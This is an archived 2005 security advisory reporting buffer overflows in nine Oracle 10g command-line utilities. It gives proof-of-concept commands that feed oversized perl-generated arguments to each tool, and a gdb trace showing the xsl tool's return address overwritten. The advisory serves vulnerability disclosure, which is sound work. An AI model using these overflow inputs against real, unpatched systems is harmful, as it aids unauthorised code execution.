Various Buffer Overflows in Oracle 10g Tools

From: Joxean Koret (joxeankoret_at_yahoo.es)
Date: 01/20/05

  • Next message: raf somers: "bug report comersus Back Office Lite 6.0 and 6.0.1"
    To: Security Tracker <bugs@securitytracker.com>, Secunia <vuln@secunia.com>, bugtraq@securityfocus.com, siaaypee@euskalnet.net
    Date: Thu, 20 Jan 2005 22:04:33 +0000
    
    
    

    ---------------------------------------------------------------------------
               Various Buffer Overflows in Oracle 10g Tools
    ---------------------------------------------------------------------------

    Author: Jose Antonio Coret (Joxean Koret)
    Date: 2004, 2005
    Location: Basque Country

    ---------------------------------------------------------------------------

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Oracle10g - Version 10.1.0.3.0

    Web : http://www.oracle.com

    ---------------------------------------------------------------------------

    Vulnerability List:
    ~~~~~~~~~~~~~~~~~~~

    A.- Oracle XML Developers Kit 10.1.0.3.0 - Production
    B.- Kerberos Utilities: Version 10.1.0.3.0 - Production
    C.- Configuration tool for Oracle Cluster Registry
    D.- NMUCT Program
    E.- MAPSGA - An utility to dump the SGA
    F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production
    G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 -
    Production
    H.- IMPDP y EXPDP: Release 10.1.0.3.0 - Production
    I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~

    A.- Oracle XML Developers Kit 10.1.0.3.0 - Production

    A1. BOF in stylesheet argument

    Oracle10g Database Servers XSL processor tool called XSL is vulnerable
    to buffer overflows.
    This may allow to run arbitrary code.

    A2. Samples

    joxean@nemobox:/data/oracle/bin$ ./xsl -B a `perl -e 'print "a"x2272;'`
    oracle
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./xsl -f `perl -e 'print "a"x2272;'`
    oracle
    Segmentation fault

    NOTE: Argument must be more than 2272 character long.

    joxean@nemobox:/data/oracle/bin$ gdb ./xsl
    (bla, bla, bla...)
    This GDB was configured as "i386-linux"...Using host libthread_db
    library "/lib/libthread_db.so.1".

    (gdb) run -B a `perl -e 'print "a"x2272;'` oracle
    Starting program: /data/oracle/bin/xsl -B a `perl -e 'print "a"x2272;'`
    oracle
    [Thread debugging using libthread_db enabled]
    [New Thread 16384 (LWP 8457)]

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 16384 (LWP 8457)]
    0x61616161 in ?? ()
    (gdb) print $ebp
    $1 = (void *) 0x61616161
    (gdb) print $ebp+4
    $2 = (void *) 0x61616165
    (gdb) quit
    The program is running. Exit anyway? (y or n) y
    joxean@nemobox:/data/oracle/bin$

    We have been overwrite the return address with 0x61616161, the 'a'
    character

    B.- Kerberos Utilities: Version 10.1.0.3.0 - Production

    B1. BOF in cachename parameter

    The Oracle10g Database Server Kerberos Utilities are vulnerables to
    buffer overflows. This may allow
    to run arbitrary code.

    B2. Samples

    joxean@nemobox:/data/oracle/bin$ ./oklist -c `perl -e 'print "a"x300;'`
    Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on
    11-NOV-2004 18:52:28
    Copyright (c) 1996, 2002 Oracle. All rights reserved.

    Segmentation fault

    joxean@nemobox:/data/oracle/bin$ ./okdstry -c `perl -e 'print
    "x"x6000;'`
    Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on
    11-NOV-2004 18:59:59
    Copyright (c) 1996, 2002 Oracle. All rights reserved.

    Segmentation fault

    C.- Configuration tool for Oracle Cluster Registry

    C1. Upgrade argument Buffer Overflow

    The Oracle10g Database Server OCRCONFIG tool is vulnerable to buffer
    overflows. This may allow to
    run arbitrary code.

    C2. Sample

    joxean@nemobox:/data/oracle/bin$ ./ocrconfig `perl -e 'print
    "a"x6000;'`
    Segmentation fault

    D.- NMUCT Program

    D1. NMUCT???

    I don't known for what purposes serves this Oracle10g tool (?) but this
    is vulnerable to buffer
    overflows (any parameter!).

    D1. Samples

    joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'`
    `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print
    "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'`
    Now in main ....
    Segmentation fault

    Next tests :

    joxean@nemobox:/data/oracle/bin$ ./nmuct a a a a `perl -e 'print
    "a"x6000;'` a
    Now in main ....
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./nmuct a a a `perl -e 'print
    "a"x6000;'` a a
    Now in main ....
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./nmuct a a `perl -e 'print "a"x6000;'`
    a a a
    Now in main ....
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./nmuct a `perl -e 'print "a"x6000;'` a
    a a a
    Now in main ....
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'` a a
    a a a
    Now in main ....
    Segmentation fault

    Almost any argument in this program is vulnerable to BOFs

    E.- MAPSGA - An utility to dump the SGA

    E1. BOF at the first argument

    The Oracle10g Database Server MAPSGA tool is vulnerable to buffer
    overflows. This may allow
    to run arbitrary code.

    E2. Sample(s)

    joxean@nemobox:/data/oracle/bin$ ./mapsga `perl -e 'print "a"x60000;'`
    Segmentation fault

    joxean@nemobox:/data/oracle/bin$ gdb mapsga
    (more bla, bla, bla...)
    This GDB was configured as "i386-linux"...Using host libthread_db
    library "/lib/libthread_db.so.1".

    (gdb) run `perl -e 'print "x"x6000;'`
    Starting program: /data/oracle/bin/mapsga `perl -e 'print "x"x6000;'`
    [Thread debugging using libthread_db enabled]
    [New Thread 16384 (LWP 28581)]

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 16384 (LWP 28581)]
    0x41044390 in getenv () from /lib/libc.so.6
    (gdb) print $ebp
    $1 = (void *) 0xbfffd9f4
    (gdb) print $ebp+4
    $2 = (void *) 0xbfffd9f8
    (gdb) quit
    The program is running. Exit anyway? (y or n) y

    F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production

    F1. Another BOF

    The Oracle10g Database Server NLS Data Installation Utility is
    vulnerable to buffer overflows. This
    may allow to run arbitrary code.

    F2. Samples

    joxean@nemobox:/data/oracle/bin$ ./lxinst `perl -e 'print "x"x6000;'`

    NLS Data Installation Utility: Version 10.1.0.3.0 - Production
    Copyright (c) Oracle 1993, 2004. All rights reserved.

    CORE 10.1.0.3.0 Production

    Segmentation fault

    joxean@nemobox:/data/oracle/bin$ gdb lxinst
    (And more bla, bla, bla...)
    This GDB was configured as "i386-linux"...Using host libthread_db
    library "/lib/libthread_db.so.1".

    (gdb) run `perl -e 'print "x"x6000;'`
    Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x6000;'`
    [Thread debugging using libthread_db enabled]
    [New Thread 16384 (LWP 29664)]

    NLS Data Installation Utility: Version 10.1.0.3.0 - Production

    Copyright (c) Oracle 1993, 2004. All rights reserved.

    CORE 10.1.0.3.0 Production

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 16384 (LWP 29664)]
    0x4109045d in mempcpy () from /lib/libc.so.6
    (gdb) run `perl -e 'print "x"x60000;'`
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x60000;'`
    [Thread debugging using libthread_db enabled]
    [New Thread 16384 (LWP 29696)]

    NLS Data Installation Utility: Version 10.1.0.3.0 - Production

    Copyright (c) Oracle 1993, 2004. All rights reserved.

    CORE 10.1.0.3.0 Production

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 16384 (LWP 29696)]
    0x4109045d in mempcpy () from /lib/libc.so.6

    G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 -
    Production

    G1. Another BOF :)

    The Oracle10g NLS Binary Message File Generation Utility tool is
    vulnerable to buffer overflows.
    This may allow to run arbitrary code.

    G2. Samples

    joxean@nemobox:/data/oracle/bin$ ./lmsgen `perl -e 'print "x"x6000;'`
    `perl -e 'print "x"x6000;'` `perl -e 'print "x"x6000;'`

    NLS Binary Message File Generation Utility: Version 10.1.0.3.0 -
    Production

    Copyright (c) Oracle 1979, 2004. All rights reserved.

    CORE 10.1.0.3.0 Production

    Input file name too long:
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    (...)
    Can't open message file
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
    Incorrect number of arguments specified!

    Syntax:
    LMSGEN <text file> <product> <facility> [language] [-i indir] [-o
    outdir]

    Where <text file> is a message text file
          <product> the name of the product
          <facility> the name of the facility
          [language] optional message language in
                      <language>_<territory>.<character set> format
                      This is required if message file is not tagged
    properly
                      with language
          [-i indir] optional directory where to locate the text file
          [-o outdir] optional directory where to put the generated binary
    file.
    Segmentation fault

    Another easy test: lmsgen `perl -e 'print "x"x6000;'` a a

    H.- IMPDP y EXPDP: Release 10.1.0.3.0 - Production

    H1. Buffer overflow in EXPDP and IMPDP tools

    The Oracle10g Database Server Data Pump IMPORT and EXPORT tools (calleds
    impdp and expdp) are
    vulnerable to buffer overflows. This may allow code execution.

    H2 Samples

    joxean@nemobox:/data/oracle/bin$ ./impdp `perl -e 'print "a"x60000;'`
    Segmentation fault

    joxean@nemobox:/data/oracle/bin$ ./expdp `perl -e 'print "x"x5000;'`

    Export: Release 10.1.0.3.0 - Production on Thursday, 11 November, 2004
    20:27

    Copyright (c) 2003, Oracle. All rights reserved.
    Segmentation fault

    I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00

    I1. Another BOF

    The Oracle10g Database Server Genezi tool is vulnerable to buffer
    overflows. This may allow to
    run arbitrary code.

    I2. Samples

    joxean@nemobox:/data/oracle/bin$ ./genezi -c `perl -e 'print "x"x5000;'`
    Segmentation fault

    The fix:
    ~~~~~~~~

    Oracle has been released patches for these and more issues. Patches are
    available to dowwload
    from the MetaLink site, at http://metalink.oracle.com

    Disclaimer:
    ~~~~~~~~~~~

    The information in this advisory and any of its demonstrations is
    provided
    "as is" without any warranty of any kind.

    I am not liable for any direct or indirect damages caused as a result of
    using the information or demonstrations provided in any part of this
    advisory.

    ---------------------------------------------------------------------------

    Contact:
    ~~~~~~~~

            Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

    
    



  • Next message: raf somers: "bug report comersus Back Office Lite 6.0 and 6.0.1"

    Relevant Pages

    • [EXPL] Oracle Command Line Overflow (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A locally exploitable buffer overflow has been found in the 'oracle' ... restricted sections of the database, ... 'print "A"x9850'` Segmentation fault ...
      (Securiteam)
    • Oracle Intelligent Agent causes segmentation fault.
      ... Has anyone else come across this segmentation fault error and was able to ... Oracle 10g Certified Professional ... "If you don't eat your meat, you cannot have any pudding. ...
      (comp.databases.oracle.server)
    • [ANN] ruby-oci8 2.0.4
      ... Few new features and many fixed issues. ... More than 50 % of issues are reported by Raimonds Simanovskis. ... Gets the Oracle error message specified by message id. ... Segmentation fault when a collection of string is bound. ...
      (comp.lang.ruby)
    • Urgent
      ... We try to create resource group for oracle, by attach IPMP group to logical ... resource name and we always get segmentation fault. ...
      (comp.unix.solaris)
    • [Full-disclosure] RE: Oracle read-only user can insert/update/delete data
      ... I have sent testcases to Oracle too that shows that it works against any oracle version currently ... Buffer Overflow Vulnerability (SCO Security Advisories) ... Mandriva Linux 2006.0/X86_64: ...
      (Full-Disclosure)